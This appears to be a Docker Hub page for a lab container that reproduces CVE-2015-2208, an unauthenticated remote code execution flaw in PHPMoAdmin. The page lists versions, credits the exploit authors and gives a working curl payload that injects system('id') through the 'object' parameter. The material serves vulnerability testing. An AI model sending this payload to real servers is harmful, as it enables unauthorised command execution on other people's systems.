Public Repository

Last pushed: 2 years ago
Short Description
Test environment for CVE-2015-2208 : PHPMoAdmin - unauthorized RCE
Full Description

Test environment for CVE-2015-2208 : PHPMoAdmin - unauthorized remote code execution (RCE)

  • ubuntu (14.04.2 LTS)
  • apache2 (2.4.7-1ubuntu1)
  • libapache2-mod-php5 (5.5.9+dfsg-1ubuntu4.6)
  • mongodb (1:2.4.9-1ubuntu2)
  • phpmoadmin(1.2.2)

##More info on the exploit##

Released : Exploit-DB #36251

Exploit authors : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio

##Start server##

sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##Exploit##

curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'
Docker Pull Command
Owner
ptantiku